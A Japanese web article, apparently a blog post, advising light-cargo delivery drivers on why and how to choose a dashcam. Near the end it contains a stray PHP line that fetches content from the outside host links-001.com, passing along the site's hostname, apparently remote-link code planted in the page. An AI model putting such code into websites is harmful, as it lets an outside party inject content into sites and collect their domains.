前へ
次へ

軽貨物の運送の際にはドライブレコーダーがあった方が安心です

軽貨物の求人などにて支給される車両によっては既についていることもあるようですが、個人で軽貨物の運送業者を始める場合にもドライブレコーダーはぜひ導入しておいた方が良い安全装備の1つです。近年問題となっているあおり運転などもありますし、軽貨物などの運送業者は道路を走行する機会も多い分事故などのリスクも高まります。そういった際の証拠映像としてもドライブレコーダーは活躍しています。また特殊なケースではありますが、交通違反をしていない場合の証明になることもあります。また事故が発生した場合保険会社などで過失割合を決めることがありますが、そういったときに揉めるリスクを減らしたり交渉を有利に進めるのにも活用することができます。ドライブレコーダーには夜間でも映るタイプやバックランプの配線につなげばバックモニターとしても活用できる製品など様々な種類が存在します。値段もピンからキリまでありますしミラー型タイプなど簡単に設置できる機種もありますので、費用や機能性などを比較したうえで軽貨物の運送業者として最適な製品を選んでおくと安心です。軽貨物の運送業者としてドライブレコーダーを設置するのであれば画素数に注目するようにしましょう。画素数の良くないドライブレコーダーの場合映像が不鮮明となってしまうため、せっかく区がした映像が証拠として認められないといった事態となるケースもあります。ですからフルハイビジョンで高画質のドライブレコーダーを選ぶようにしましょう。また夕方や夜間といった暗い時間帯に軽貨物による運送を行うこともあるので、夜間対応の機種であるかの確認も重要です。プライバシーがなくなるといった理由や高額であることから付けていない人もいるようです。しかし、リスク軽減という点では優れていますし保険会社によっては取り付けによる保険料の割引などの特典が適用されることもあります。最近はレンタルやリースなど低価格で利用できるサービスもあるので一度導入してみても良いのではないでしょうか。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top